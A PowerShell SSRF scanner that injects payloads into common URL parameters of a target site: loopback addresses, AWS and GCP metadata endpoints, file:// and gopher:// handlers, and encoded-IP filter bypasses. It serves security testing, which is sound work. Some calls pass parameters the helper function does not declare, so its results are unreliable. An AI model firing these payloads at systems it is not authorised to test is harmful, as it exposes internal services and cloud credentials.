# SSRF Security Testing Script (PowerShell)
# Covers: CWE-918
param([string]$TargetUrl, [ValidateSet("quick","full")][string]$Mode="full", [switch]$CleanOutput, [switch]$Help)

if ($Help) { Write-Host "SSRF Security Scanner - Tests for Server-Side Request Forgery"; exit 0 }
if ([string]::IsNullOrEmpty($TargetUrl)) { Write-Host "Error: TargetUrl required" -ForegroundColor Red; exit 1 }
if ($TargetUrl -notmatch "^https?://") { $TargetUrl = "https://$TargetUrl" }
$TargetUrl = $TargetUrl.TrimEnd('/')

# Authentication support (Cookie or Bearer token)
$AuthCookie = $env:AUTH_COOKIE
$AuthToken = $env:AUTH_TOKEN

# Helper function for authenticated web requests
function Invoke-AuthWebRequest {
    param([string]$Uri, [string]$Method = "GET", [object]$Body, [string]$ContentType, [hashtable]$Headers, [int]$TimeoutSec = 10)
    $params = @{ Uri = $Uri; Method = $Method; TimeoutSec = $TimeoutSec; UseBasicParsing = $true; ErrorAction = "SilentlyContinue" }
    if ($Body) { $params.Body = $Body }
    if ($ContentType) { $params.ContentType = $ContentType }
    $authHeaders = @{}
    if ($Headers) { $Headers.Keys | ForEach-Object { $authHeaders[$_] = $Headers[$_] } }
    if ($AuthToken) { $authHeaders["Authorization"] = "Bearer $AuthToken" }
    if ($authHeaders.Count -gt 0) { $params.Headers = $authHeaders }
    if ($AuthCookie -and -not $AuthToken) {
        $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
        $AuthCookie -split ';' | ForEach-Object {
            $parts = $_.Trim() -split '=', 2
            if ($parts.Count -eq 2) {
                try { $session.Cookies.Add((New-Object System.Net.Cookie($parts[0], $parts[1], "/", ([Uri]$Uri).Host))) } catch {}
            }
        }
        $params.WebSession = $session
    }
    Invoke-WebRequest @params
}

$script:TestsPassed=0; $script:TestsFailed=0; $script:TestsTotal=0
$script:HighRiskFindings=0; $script:HighRiskList=@()
$script:AuthErrors=0  # Track 401/403 responses
$SsrfParams = @("url","uri","path","link","src","redirect","callback","dest","file","load","fetch")

Write-Host "`n🌐 SSRF SECURITY SCANNER" -ForegroundColor Magenta
Write-Host "Target: $TargetUrl | Mode: $Mode" -ForegroundColor Blue
if ($AuthToken) { Write-Host "🔐 Bearer token authentication enabled" -ForegroundColor Green }
if ($AuthCookie -and -not $AuthToken) { Write-Host "🔐 Cookie authentication enabled" -ForegroundColor Green }
if (-not $AuthToken -and -not $AuthCookie) { Write-Host "ℹ️ Running without authentication (unauthenticated scan)" -ForegroundColor Yellow }

Write-Host ""

function Test-InternalSSRF {
    Write-Host "`n🏠 PHASE 1: INTERNAL NETWORK SSRF" -ForegroundColor Yellow
    $targets = @("http://localhost","http://127.0.0.1","http://[::1]","http://169.254.169.254")
    $script:TestsTotal++; $found = $false
    foreach ($target in $targets) {
        foreach ($param in $SsrfParams) {
            try {
                $r = Invoke-AuthWebRequest -Uri "$TargetUrl/?$param=$target" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
                if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++; continue }
                if ($r.Content -match "localhost|127\.0\.0\.1|root:|admin|mysql") {
                    $found = $true; Write-Host "  ⚠️ SSRF: $param=$target" -ForegroundColor Red; break
                }
            } catch {
                if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
            }
        }
        if ($found) { break }
    }
    if ($found) {
        Write-Host "❌ FAIL: Internal SSRF detected" -ForegroundColor Red
        $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "Internal SSRF"
    } else {
        Write-Host "✅ PASS: No internal SSRF" -ForegroundColor Green; $script:TestsPassed++
    }
}

function Test-CloudMetadata {
    Write-Host "`n☁️ PHASE 2: CLOUD METADATA SSRF" -ForegroundColor Yellow
    $metadata = @("http://169.254.169.254/latest/meta-data/","http://metadata.google.internal/computeMetadata/v1/")
    $script:TestsTotal++; $found = $false
    foreach ($url in $metadata) {
        foreach ($param in $SsrfParams) {
            try {
                $headers = @{"Metadata-Flavor"="Google"}
                $r = Invoke-AuthWebRequest -Uri "$TargetUrl/?$param=$url" -Headers $headers -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
                if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++; continue }
                if ($r.Content -match "ami-id|instance-id|AccessKeyId|computeMetadata") {
                    $found = $true; Write-Host "  ⚠️ Cloud metadata: $url" -ForegroundColor Red; break
                }
            } catch {
                if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
            }
        }
        if ($found) { break }
    }
    if ($found) {
        Write-Host "❌ FAIL: Cloud metadata SSRF" -ForegroundColor Red
        $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "Cloud Metadata SSRF"
    } else {
        Write-Host "✅ PASS: No cloud metadata SSRF" -ForegroundColor Green; $script:TestsPassed++
    }
}

function Test-ProtocolHandlers {
    Write-Host "`n📂 PHASE 3: PROTOCOL HANDLERS" -ForegroundColor Yellow
    $payloads = @("file:///etc/passwd","file:///c:/windows/win.ini","gopher://localhost:6379/_INFO")
    $script:TestsTotal++; $found = $false
    foreach ($payload in $payloads) {
        foreach ($param in $SsrfParams) {
            try {
                $r = Invoke-AuthWebRequest -Uri "$TargetUrl/?$param=$payload" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
                if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++; continue }
                if ($r.Content -match "root:|localhost|REDIS|\[extensions\]") {
                    $found = $true; Write-Host "  ⚠️ Protocol: $payload" -ForegroundColor Red; break
                }
            } catch {
                if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
            }
        }
        if ($found) { break }
    }
    if ($found) {
        Write-Host "❌ FAIL: Protocol handler SSRF" -ForegroundColor Red
        $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "Protocol Handler SSRF"
    } else {
        Write-Host "✅ PASS: Protocol handlers blocked" -ForegroundColor Green; $script:TestsPassed++
    }
}

function Test-SSRFBypasses {
    Write-Host "`n🔓 PHASE 4: SSRF BYPASSES" -ForegroundColor Yellow
    $bypasses = @("http://2130706433","http://0x7f000001","http://127.1","http://localtest.me")
    $script:TestsTotal++; $found = $false
    foreach ($bypass in $bypasses) {
        foreach ($param in $SsrfParams) {
            try {
                $r = Invoke-AuthWebRequest -Uri "$TargetUrl/?$param=$bypass" -TimeoutSec 10 -UseBasicParsing -ErrorAction SilentlyContinue
                if ($r.StatusCode -eq 401 -or $r.StatusCode -eq 403) { $script:AuthErrors++; continue }
                if ($r.Content -match "localhost|127\.0\.0\.1|root:") {
                    $found = $true; Write-Host "  ⚠️ Bypass: $bypass" -ForegroundColor Red; break
                }
            } catch {
                if ($_.Exception.Response.StatusCode -eq 401 -or $_.Exception.Response.StatusCode -eq 403) { $script:AuthErrors++ }
            }
        }
        if ($found) { break }
    }
    if ($found) {
        Write-Host "❌ FAIL: SSRF bypass works" -ForegroundColor Red
        $script:TestsFailed++; $script:HighRiskFindings++; $script:HighRiskList += "SSRF Bypass"
    } else {
        Write-Host "✅ PASS: Bypasses blocked" -ForegroundColor Green; $script:TestsPassed++
    }
}

function Show-Summary {
    Write-Host "`n======================================================" -ForegroundColor Magenta
    Write-Host "📊 SSRF SECURITY SUMMARY" -ForegroundColor Magenta
    $rate = if($script:TestsTotal -gt 0){[Math]::Round(($script:TestsPassed/$script:TestsTotal)*100)}else{0}
    Write-Host "Tests: $($script:TestsTotal) | Passed: $($script:TestsPassed) | Failed: $($script:TestsFailed) | Rate: $rate%"
    Write-Host "High Risk: $($script:HighRiskFindings)" -ForegroundColor Red
    if ($script:HighRiskList.Count -gt 0) {
        Write-Host "🚨 FINDINGS:" -ForegroundColor Red
        $script:HighRiskList | ForEach-Object { Write-Host "  • $_" -ForegroundColor Red }
    }

    # Warn about authentication errors
    if ($script:AuthErrors -gt 0) {
        Write-Host ""
        Write-Host "⚠️  WARNING: $($script:AuthErrors) requests returned 401/403 Unauthorized" -ForegroundColor Yellow
        if (-not $AuthToken -and -not $AuthCookie) {
            Write-Host "   Results may have FALSE NEGATIVES. Provide credentials to test protected endpoints." -ForegroundColor Yellow
        } else {
            Write-Host "   Provided credentials may be invalid or expired." -ForegroundColor Yellow
        }
    }

    $score = 100 - ($script:HighRiskFindings * 25); if($score -lt 0){$score=0}
    Write-Host "Score: $score/100" -ForegroundColor $(if($score -ge 80){"Green"}elseif($score -ge 60){"Yellow"}else{"Red"})
}

Test-InternalSSRF
Test-CloudMetadata
if ($Mode -eq "full") { Test-ProtocolHandlers; Test-SSRFBypasses }
Show-Summary
